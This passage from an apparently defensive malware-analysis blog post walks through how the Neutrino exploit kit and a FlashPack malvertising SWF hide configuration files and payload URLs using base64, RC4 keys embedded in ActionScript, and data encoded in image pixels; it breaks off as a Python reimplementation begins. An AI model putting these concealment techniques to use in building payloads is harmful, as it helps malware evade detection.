<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQW7JMAbX_t-K7e4Sx43ZcohjKxB9fSMi_a9RkBv4J7hsd8onAnHXn538XLzsLhhbzwNvgjo5DGDokw30PNJbxTFoYkZNZ945mDfXsuYBfeLwmnUSd3d-Zo-bJPjvP4jjMRK5tBEErYqz/s1600/reportPageEx10.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="205" data-original-width="626" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQW7JMAbX_t-K7e4Sx43ZcohjKxB9fSMi_a9RkBv4J7hsd8onAnHXn538XLzsLhhbzwNvgjo5DGDokw30PNJbxTFoYkZNZ945mDfXsuYBfeLwmnUSd3d-Zo-bJPjvP4jjMRK5tBEErYqz/s320/reportPageEx10.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of findings view showing evidence of a linked ZIP file from the document</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLlB_e7O_PLiQFifMtOrJ4zN5z2tynJ8ln6gAkt6miB_S_nFT-k0jSgYcX6kb7nEJAi22BE8iw7KBgV9NfapYt_xCVqZlJuglrsKyXGV06k5WyhKRGNJOLoLlM3J9O-c3D4RzCDrFHTJ/s1600/reportPageEx11.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="213" data-original-width="619" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdZLlB_e7O_PLiQFifMtOrJ4zN5z2tynJ8ln6gAkt6miB_S_nFT-k0jSgYcX6kb7nEJAi22BE8iw7KBgV9NfapYt_xCVqZlJuglrsKyXGV06k5WyhKRGNJOLoLlM3J9O-c3D4RzCDrFHTJ/s320/reportPageEx11.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of extracted downloadable artifact (VBA macro script in this case)</td></tr>
</tbody></table>
<br />
<h2>
<span style="color: #3d85c6;">Closing Note</span></h2>
<div>
If you have any feedback, please do not hesitate to reach out. I believe there is no better way to improve something than to hear what people think about it.</div>
<h2>
<span style="color: #3d85c6;">Data Obfuscation: Now you see me... Now you don't...</span></h2>
<div>
Denis O'Brien, 2015-03-22</div>
<br />
<b><span style="color: #3d85c6;">Introduction</span></b><br />
<br />
This blog post shows how malware authors use Adobe Flash files to hide their creations' '<span style="color: #3d85c6;">sensitive</span>' data. I'll be using 2 recent Neutrino EK samples and 1 FlashPack <a href="http://www.torrycrass.com/2015/02/06/flash-malware-propagating-via-cdn-cve-2015-0313/" rel="nofollow" target="_blank">malvertising</a> sample to demonstrate it. In the Neutrino EK case our goal will be the extraction and decryption of its configuration file, and in the malvertising case we'll be after the initial payload URL plus the exploit shellcode.<br />
<br />
<b><span style="color: #3d85c6;">Executive Summary</span></b><br />
<br />
It's fair to say that the exploit kit world has been revolving around Adobe Flash files lately. The ActionScript language that drives SWF file execution is quite versatile and, when combined with other SWF features such as binary data containers or embedded images, creates a strong application environment capable of executing relatively complex tasks. Some exploit kit authors are already using SWF files as an all-in-one '<span style="color: #3d85c6;">solution</span>'. For example, Neutrino EK (aka Job314, aka Alter EK) uses Adobe Flash Player files to store exploit code, execution control logic (environment checks, exploit code selection, etc.), decryption keys for its various components and the configuration file. SWF obfuscation tools further enhance data hiding capabilities and also drastically impede reverse engineering efforts, making SWF files even more attractive to malware authors. The SWF file analysis below demonstrates how ActionScript combined with base64 encoding, RC4 encryption and image files can be used to hide data.<br />
<br />
<br />
<b><span style="color: #3d85c6;">What is magic?</span></b><br />
<br />
The Neutrino EK sample analysed in this section was captured in Dec 2014. Its relatively simple landing <a href="http://pastebin.com/TurrRB0H" rel="nofollow" target="_blank">page</a> contains a request for an SWF file and what appears to be a base64 encoded GIF file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNi-BiWbA1Z_bdNR2iGrlK6If6Nha6b2-uFWB66OD5WksuD_caeWBwxUvzOmcZC1IySfN7sB1EIAkl5WPsMh5zthV_Dc-g1ALgT2A_SEsz-Hcr80Kf6oBmIqBuxlkIcc0vE_fnHqfR8Yw6/s1600/Dec2014_landing.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNi-BiWbA1Z_bdNR2iGrlK6If6Nha6b2-uFWB66OD5WksuD_caeWBwxUvzOmcZC1IySfN7sB1EIAkl5WPsMh5zthV_Dc-g1ALgT2A_SEsz-Hcr80Kf6oBmIqBuxlkIcc0vE_fnHqfR8Yw6/s1600/Dec2014_landing.PNG" height="99" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - base64 encoded GIF stored on the landing page</i></span></div>
<br />
Let's start with the GIF file and try to manually reconstruct it. After unescaping and base64 decoding it, we end up with a chunk of binary data that's anything but a GIF file. So, it has to mean something else. Note that the &lt;img&gt; tag has an '<span style="color: #3d85c6;">id</span>' attribute - '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>'. There is no reference to it on the landing page, so quite possibly it's being used by the SWF file. After some reverse engineering '<span style="color: #3d85c6;">kung-fu</span>' and ActionScript review we come across the function below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTgNZlBZly2wr-6WoTiQ5q7poM5jQBlhetlzOIgURgZmtB4AtTfB3a9x1JQXSDvFpK6O8FJhycl8XzJJbZJMasvKkBB0AA7x7MuyDqM7ccVHuztHBSjjE5pOVbXizt0iprnicdaWwB7dAc/s1600/rtConfig_decode_routine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTgNZlBZly2wr-6WoTiQ5q7poM5jQBlhetlzOIgURgZmtB4AtTfB3a9x1JQXSDvFpK6O8FJhycl8XzJJbZJMasvKkBB0AA7x7MuyDqM7ccVHuztHBSjjE5pOVbXizt0iprnicdaWwB7dAc/s1600/rtConfig_decode_routine.png" height="97" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - AS3 function to decode data stored in '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>' landing page element</i></span></div>
<br />
The function appears to do the following:<br />
<ul>
<li>compiles and calls a JavaScript to pull out the content of the landing page element with id - '<span style="color: #3d85c6;">mqdscriyolhypdbstnmv</span>'</li>
<li>splits the pulled content at '<span style="color: #3d85c6;">base64,</span>' expression creating 2 data chunks</li>
<li>unescapes and base64 decodes the '<span style="color: #3d85c6;">second</span>' chunk</li>
<li>runs the resulting data through RC4 decryption routine</li>
</ul>
So, we have already completed the '<span style="color: #3d85c6;">unescape</span>' and '<span style="color: #3d85c6;">base64 decode</span>' operations; all we're missing now is the RC4 decryption pass, for which we need to know the key. The routine above tells us to look for it in the '<span style="color: #3d85c6;">getRtConfigKey()</span>' function. Let's take a look there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiroTLtXF0YviLLiIquyq8AnmKKZhrT55zeYRjlEcXvIBQyC3bVnJ-OWsItqrZKEMMqwx-ABlshYf6dpNfjz6Yb-xricfbZ-xBLnPRiBKqkOqe7U50uTAKI6KPI79oDHGZVXexSgTtpbySu/s1600/Dec2014_rtConfig_RC4_key.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiroTLtXF0YviLLiIquyq8AnmKKZhrT55zeYRjlEcXvIBQyC3bVnJ-OWsItqrZKEMMqwx-ABlshYf6dpNfjz6Yb-xricfbZ-xBLnPRiBKqkOqe7U50uTAKI6KPI79oDHGZVXexSgTtpbySu/s1600/Dec2014_rtConfig_RC4_key.PNG" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK Dec 2014 sample - the configuration file RC4 decryption key</span></i></div>
<br />
Alright, we got the key. Now let's find out what happens if we decrypt our data chunk with it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwQIrf9mEsyRxR8V4uRyp3YjzOzdbMtoPvephGby3TfM-7vQ_zWJSTdhJxI2E_llUwwXKKo_NGh20Ydxv2Lft1Fi8AjZd4n3rQ27TLhfG6O2fCEHIy6-Q2PuO4qxSGAFQp-S6I_ihpKEPK/s1600/Dec2014_rtConfig_decrypted.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwQIrf9mEsyRxR8V4uRyp3YjzOzdbMtoPvephGby3TfM-7vQ_zWJSTdhJxI2E_llUwwXKKo_NGh20Ydxv2Lft1Fi8AjZd4n3rQ27TLhfG6O2fCEHIy6-Q2PuO4qxSGAFQp-S6I_ihpKEPK/s1600/Dec2014_rtConfig_decrypted.PNG" height="106" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - decrypted configuration file</i></span></div>
<br />
There we go. The configuration file.<br />
<br />
To make it a bit clearer why there are so many initial payload URLs, let's take a look at the SWF file structure:
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKCYhDZuc1klg3XWxEI_j2-p6nlM81aW6f5CinezrkJn_oFw1NZI4f4C_rfTFELF6hHrCPKVEDu61Tc_WSr7BMUAvKlTZMf_KuUiyXWMTFBV2WhVx3LOOsH0QaycGZXByWx1bOsq3c6VP/s1600/Dec2014_decryptedSWF_structure.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKCYhDZuc1klg3XWxEI_j2-p6nlM81aW6f5CinezrkJn_oFw1NZI4f4C_rfTFELF6hHrCPKVEDu61Tc_WSr7BMUAvKlTZMf_KuUiyXWMTFBV2WhVx3LOOsH0QaycGZXByWx1bOsq3c6VP/s1600/Dec2014_decryptedSWF_structure.PNG" height="244" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - decrypted SWF structure</i></span></div>
<br />
Take a look at the content of the '<span style="color: #3d85c6;">exploit</span>' folder in the screenshot above and note the 5 ActionScript filenames. Each of those scripts contains a routine that decrypts and launches exploit code for some vulnerability. Now take a look at the tag names for each URL in the configuration file. Apart from the first two, the names match the names of the ActionScripts. So, it appears that each exploit has a unique URL associated with it for downloading the initial payload.<br />
<br />
<b><span style="color: #3d85c6;">Focused deception.</span></b><br />
<br />
The Neutrino EK sample analysed in this section was captured in Mar 2015. The landing <a href="http://pastebin.com/b8D5Xsk1" rel="nofollow" target="_blank">page</a> of this sample no longer has an &lt;img&gt; element with encoded data. In fact, it has nothing except the code requesting an SWF file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx8Y4-1M5vMZPZRHEtO1bNy-trrAx-ARuUKXPiuT18i7_AP8mzn9mQej0G96R4_61kQQ5n64zUyzJlofqWAnFX6zSM5dSilmOoGTFAiQM4ZMpHkfHaHMgNe9TyTJp-Io7oFIBK38RxetI8/s1600/Mar2015_landing.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx8Y4-1M5vMZPZRHEtO1bNy-trrAx-ARuUKXPiuT18i7_AP8mzn9mQej0G96R4_61kQQ5n64zUyzJlofqWAnFX6zSM5dSilmOoGTFAiQM4ZMpHkfHaHMgNe9TyTJp-Io7oFIBK38RxetI8/s1600/Mar2015_landing.PNG" height="73" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - landing page</i></span></div>
<br />
Into the ActionScript code we descend again... until we reach a function that '<span style="color: #3d85c6;">coincidentally</span>' has the same name as in the Dec 2014 sample - '<span style="color: #3d85c6;">decodeRtConfig()</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcNAuc8F2Pi7KAT4DjFn7SwuWcejJc47JnN3_jlgHpuoQUTGopUSF-C098CFbO2wHYSMmtpPPopIlQIrIX7XEbJrVFdjIMwPHuC7c1zLkv4nRSfpAbyOvWTfErpor6emizw1ukt6eIOdUb/s1600/Mar2015_rtConfig_decode_routine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcNAuc8F2Pi7KAT4DjFn7SwuWcejJc47JnN3_jlgHpuoQUTGopUSF-C098CFbO2wHYSMmtpPPopIlQIrIX7XEbJrVFdjIMwPHuC7c1zLkv4nRSfpAbyOvWTfErpor6emizw1ukt6eIOdUb/s1600/Mar2015_rtConfig_decode_routine.PNG" height="202" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - the configuration file decoding routine</i></span></div>
<br />
As expected, there is no code interacting with any data outside of the SWF file; instead there is a routine that performs some data manipulation on binary data stored in one of the SWF binary data containers. Let's see what it does:<br />
<ul>
<li>loads data from a binary data container</li>
<li>reads the first 3 bytes and converts them into an Integer with radix 16</li>
<li>continues reading the data until bytes count reaches the Integer value</li>
<li>runs the read data through RC4 decryption routine</li>
</ul>
So, simply put, there is a chunk of data of which we need to read just a part and run it through the RC4 decryption routine. Now we need to find out how much data to read and what the decryption key is. The key is not a problem at all, since it can be found in the ActionScript code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-CqjNgoEK32E5B1EikU87n2eef5a_2fJ6hxVR8ltb9kNYEzJBDrY8jMavMwqXbjEFXQkNhxe13OtLOorVwJk03U_HPQffxEdZeiwonfcXLO5AD3wJerl5l0xQw70lbVrE6Om20vJzG1YA/s1600/Mar2015_rtConfig_RC4_key.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-CqjNgoEK32E5B1EikU87n2eef5a_2fJ6hxVR8ltb9kNYEzJBDrY8jMavMwqXbjEFXQkNhxe13OtLOorVwJk03U_HPQffxEdZeiwonfcXLO5AD3wJerl5l0xQw70lbVrE6Om20vJzG1YA/s1600/Mar2015_rtConfig_RC4_key.PNG" height="60" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - the configuration file decryption key</i></span></div>
<br />
For the number of bytes to read we'll have to do some maths magic: the first 3 bytes (0x36 0x32 0x65) are the ASCII characters '<span style="color: #3d85c6;">62e</span>', and parsing that as a radix-16 integer gives us *drum roll*... 1582. Right, now we know how much data to read and the key to decrypt it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwvZfnwvrBJ_5gXuf-eqCMzje8Yuh73wnP4nJYfJjIjek41tl7OJEvBpimUcSseFVHZdziC5kGQcKhbnT3VXCi914ZDjqHkw1xBvl1F1eNcrStE5rMPl_OkiQK2Q275WNeyoXVGLLuXKB/s1600/Mar2015_rtConfig_decrypted.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwvZfnwvrBJ_5gXuf-eqCMzje8Yuh73wnP4nJYfJjIjek41tl7OJEvBpimUcSseFVHZdziC5kGQcKhbnT3VXCi914ZDjqHkw1xBvl1F1eNcrStE5rMPl_OkiQK2Q275WNeyoXVGLLuXKB/s1600/Mar2015_rtConfig_decrypted.PNG" height="117" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - decrypted configuration file</i></span></div>
<br />
And that's how we deal with this type of data hiding technique.<br />
<br />
<b><span style="color: #3d85c6;">But deception meant to entertain.</span></b><br />
<br />
At the beginning of February 2015 a FlashPack malvertising campaign was making the rounds dropping CryptoWall malware. The scheme was rather interesting:<br />
<ul>
<li>browser opens a webpage that requests some advertisement content from an ad TDS</li>
<li>TDS points the browser to an SWF file hosted on RackSpace CDN</li>
<li>browser starts showing the advertisement content that looks absolutely legit</li>
<li>6 minutes later SWF generates a request to download CryptoWall malware</li>
</ul>
Let's take a closer look at this SWF file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjraWGYKNWGOv69_C0Yu8QDykVmkZI1NGnNZ3F7ulU9sU59JvlE56vRgOY4QwCjF3Nm9wSupTVgT-4ym0JwQjBEiPzPwbLZ3cqG61BPUsYIFoqwRzRDi6b6aji2U7VQIGD8rG3EBWuyx4xh/s1600/Feb2015_FlashPack_injected_SWF.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjraWGYKNWGOv69_C0Yu8QDykVmkZI1NGnNZ3F7ulU9sU59JvlE56vRgOY4QwCjF3Nm9wSupTVgT-4ym0JwQjBEiPzPwbLZ3cqG61BPUsYIFoqwRzRDi6b6aji2U7VQIGD8rG3EBWuyx4xh/s1600/Feb2015_FlashPack_injected_SWF.png" height="320" width="177" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - SWF with '<span style="color: #3d85c6;">bonus scenes</span>'</span></i></div>
<br />
In a nutshell, there are 2 embedded SWF files, each occupying a binary data container. One of them contains some legitimate advertisement content and the other one exploit code for <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569" rel="nofollow" target="_blank">CVE-2014-0569</a>. Let's examine the latter more closely.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWxKfX_SleivBheVjfsMYxeRn6azRjmk28kkAvG8P1zIVWl4I9Z_-df4zZOKvb65AYUS9fA0jfPGqEPDchiXMoQgK2uKDM-QcCcUhoe0kNprInb1m3RemGP3bZjNAhrZcP9_otjqKEHeDJ/s1600/Feb2015_FlashPack_initialization.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWxKfX_SleivBheVjfsMYxeRn6azRjmk28kkAvG8P1zIVWl4I9Z_-df4zZOKvb65AYUS9fA0jfPGqEPDchiXMoQgK2uKDM-QcCcUhoe0kNprInb1m3RemGP3bZjNAhrZcP9_otjqKEHeDJ/s1600/Feb2015_FlashPack_initialization.png" height="320" width="219" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - initialization routine</span></i></div>
<br />
After some environment checks, the execution comes to an interesting chain of events (last 2 lines of code in the screenshot above).<br />
<ul>
<li>function '<span style="color: #3d85c6;">images</span>' is called with one argument passed to it</li>
<li>the returned value from '<span style="color: #3d85c6;">images</span>' is passed to '<span style="color: #3d85c6;">decodeurl</span>' function</li>
<li>the returned value from '<span style="color: #3d85c6;">decodeurl</span>' is passed to '<span style="color: #3d85c6;">hex2bin</span>' function</li>
<li>the returned value from '<span style="color: #3d85c6;">hex2bin</span>' is split at '<span style="color: #3d85c6;">&</span>' character</li>
</ul>
<div>
Judging by the function names, we can assume that by passing the data stored in '<span style="color: #3d85c6;">var_29</span>' to the '<span style="color: #3d85c6;">images</span>' function we will end up with 2 pieces of data when '<span style="color: #3d85c6;">hex2bin</span>' returns: one presumably a URL and the other one unknown as yet. So, let's find out what '<span style="color: #3d85c6;">var_29</span>' is.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6vk41EfL68vm2K4fRsQ_gfMN726thk5WOvxcILCAhHuYe7RxFKQtBSp6Xbwh_xIsNACIk4zurrZp0bAjdYJIUalHBnfOj6HZtRR1IAB0lBV5k-IxeQdFnye0LjOJewhmP1f1OZLByYac3/s1600/Feb2015_FlashPack_var_29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6vk41EfL68vm2K4fRsQ_gfMN726thk5WOvxcILCAhHuYe7RxFKQtBSp6Xbwh_xIsNACIk4zurrZp0bAjdYJIUalHBnfOj6HZtRR1IAB0lBV5k-IxeQdFnye0LjOJewhmP1f1OZLByYac3/s1600/Feb2015_FlashPack_var_29.png" height="35" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
'<span style="color: #3d85c6;">var_29</span>' is assigned '<span style="color: #3d85c6;">class_7</span>' object. So, what is this object...</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2L0tXDQ2LYo-H7tirOyXRTy4cT14kZQ698LzT-QLxXh49bZ6Y5PyWvoGzMJU4gDLpHRBCkmh3JbBwTqtel0Mn_2zbZl88bu-tqw9MR4p5k6ohTvYaLFtpu8n5guV8SwZkzuyftVl9gvVj/s1600/Feb2015_FlashPack_class_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2L0tXDQ2LYo-H7tirOyXRTy4cT14kZQ698LzT-QLxXh49bZ6Y5PyWvoGzMJU4gDLpHRBCkmh3JbBwTqtel0Mn_2zbZl88bu-tqw9MR4p5k6ohTvYaLFtpu8n5guV8SwZkzuyftVl9gvVj/s1600/Feb2015_FlashPack_class_7.png" height="231" width="320" /></a></div>
<div>
<br /></div>
<div>
Ok, '<span style="color: #3d85c6;">class_7</span>' appears to be a '<span style="color: #3d85c6;">BitmapAsset</span>', but which one...</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNgdd6cbIHSIILkhtEExfI9RLd5cDa0kHqgHk7ZrOOSAYQ7RJsSU_GPtwov1CCSCV0pDid8MYoAxex9v0onM59prbjuYwAT35ahc2L1cehErMVj9DFfvvJ1uNDSID0K97qR1gmN3VoGF_/s1600/Feb2015_FlashPack_class_7_BitmapAsset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNgdd6cbIHSIILkhtEExfI9RLd5cDa0kHqgHk7ZrOOSAYQ7RJsSU_GPtwov1CCSCV0pDid8MYoAxex9v0onM59prbjuYwAT35ahc2L1cehErMVj9DFfvvJ1uNDSID0K97qR1gmN3VoGF_/s1600/Feb2015_FlashPack_class_7_BitmapAsset.png" /></a></div>
<div>
<br /></div>
<div>
Alright, '<span style="color: #3d85c6;">var_29</span>' is actually an image file stored in the SWF file. Now, let's find out what happens to it when it's passed to the '<span style="color: #3d85c6;">images</span>' function.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5yS-3gvTx2Jcerv9GB6eTcaPACpC9QECnbZu9s1KoCXxUcEMOF-FiNLJYcp4gWOpQJVKVeCgu9WayzIvZAtrZnEQnJk96Cow5XWmhe_3XBvH-diy5dVQXCwu4UrKyPAe02T_2-Oky6rKY/s1600/Feb2015_FlashPack_images_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5yS-3gvTx2Jcerv9GB6eTcaPACpC9QECnbZu9s1KoCXxUcEMOF-FiNLJYcp4gWOpQJVKVeCgu9WayzIvZAtrZnEQnJk96Cow5XWmhe_3XBvH-diy5dVQXCwu4UrKyPAe02T_2-Oky6rKY/s1600/Feb2015_FlashPack_images_function.png" height="316" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">images</span>' function</span></i></div>
<div>
<br /></div>
The function performs the following:<br />
<ul>
<li>extracts the image's bitmap data</li>
<li>identifies the number of pixel rows</li>
<li>reads the pixel values one by one from each identified row</li>
<li>converts each pixel value to a character and appends it to a string</li>
</ul>
<div>
Simple enough operation, but let's find out what happens with the resulting string in the '<span style="color: #3d85c6;">decodeurl</span>' function.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIYp2paEMmRuJXtdvEDeAzkccKORShM_IYuFX2h-JVG4EUp30UjnWl_LkezdmGe_agoD95DiGYOPNrg2ycHl13QYfvNg6fJoLy8mGdpzQebvn0IK4rTDibXThVX9jDpb-Dq_qcBRW4Rer/s1600/Feb2015_FlashPack_decodeurl_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIYp2paEMmRuJXtdvEDeAzkccKORShM_IYuFX2h-JVG4EUp30UjnWl_LkezdmGe_agoD95DiGYOPNrg2ycHl13QYfvNg6fJoLy8mGdpzQebvn0IK4rTDibXThVX9jDpb-Dq_qcBRW4Rer/s1600/Feb2015_FlashPack_decodeurl_function.png" height="145" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">decodeurl</span>' function</span></i></div>
<br />
This function performs the following:<br />
<ul>
<li>loops through the string received from the '<span style="color: #3d85c6;">images</span>' function character by character</li>
<li>finds the position of each character in a predefined string - '<span style="color: #3d85c6;">_loc3_</span>'</li>
<li>takes the character at the same position from a different string - '<span style="color: #3d85c6;">_loc2_</span>'</li>
<li>appends this character to a new string - '<span style="color: #3d85c6;">_loc4_</span>'</li>
</ul>
<div>
The result of the '<span style="color: #3d85c6;">decodeurl</span>' function is expected to be a string of '<span style="color: #3d85c6;">hex</span>' values. So, let's see what happens during the final transformation of what used to be an image file.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9vQOHrWVeSG5CvPaeUnbHO-k2swCUBHKs7_Iiywtwks42drD2PIS6Hk58qFUawiWTenfF05rj5zaIcmD-bRs1blTo46u92K6UWt2TSQnLa_GoAM0UY5VJRBoIn-NPjvemhQugiY8fdX4Y/s1600/Feb2015_FlashPack_hex2bin_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9vQOHrWVeSG5CvPaeUnbHO-k2swCUBHKs7_Iiywtwks42drD2PIS6Hk58qFUawiWTenfF05rj5zaIcmD-bRs1blTo46u92K6UWt2TSQnLa_GoAM0UY5VJRBoIn-NPjvemhQugiY8fdX4Y/s1600/Feb2015_FlashPack_hex2bin_function.png" height="72" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">hex2bin</span>' function</span></i></div>
<div>
<br /></div>
<div>
The '<span style="color: #3d85c6;">hex2bin</span>' function indeed expects a string of '<span style="color: #3d85c6;">hex</span>' values: it loops through the string two characters at a time, converts each pair to a character and appends that character to a string.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSPFMoCDA_gNwvi5AfTO3cgJDBHQQmM3_LUWp4I7UwLAn_JIbcLzY_m9nVz_0rsdA8n5roij-vmgstH0U1q2NLMFehcHm3Wd7yfOHgGPCjZ4BTBRT_I96TPp3Q392-nU3rDS0lYrxuwOhH/s1600/meme.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSPFMoCDA_gNwvi5AfTO3cgJDBHQQmM3_LUWp4I7UwLAn_JIbcLzY_m9nVz_0rsdA8n5roij-vmgstH0U1q2NLMFehcHm3Wd7yfOHgGPCjZ4BTBRT_I96TPp3Q392-nU3rDS0lYrxuwOhH/s1600/meme.jpg" height="320" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Exactly my feeling after analyzing this sample</span></i></div>
<br />
Ok, now let's do the same thing in Python and see what happens.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
